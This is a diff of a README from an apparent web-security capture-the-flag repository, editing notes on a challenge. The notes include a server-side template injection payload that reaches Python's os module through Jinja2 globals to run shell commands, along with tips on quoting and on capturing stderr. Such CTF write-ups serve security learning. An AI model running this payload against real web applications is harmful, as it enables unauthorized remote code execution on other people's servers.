AlexisAuriac/Web-Security-CTF/README.md

 Port 4242 is not http.

-We used python3 to open a TCP socket.
+We can use python3 to open a TCP socket.

-To run python code we can use ```python3 -c "command"```.

-The ssti command looks like this:
+Run python code with ssti:
 ```py
 {{request.application.__globals__.__builtins__.__import__("os").popen("python -c \"CMD\"").read()}}
 ```
-Note: quotes get a little tricky, the python command can only single quotes, at least using our implementation.
+Note: quotes get a little tricky, the python command can only use single quotes, at least using our implementation.

 To see stderr we add ``` 2>&1 | cat``` at the end of the command (redirects stderr to stdout).
 ```py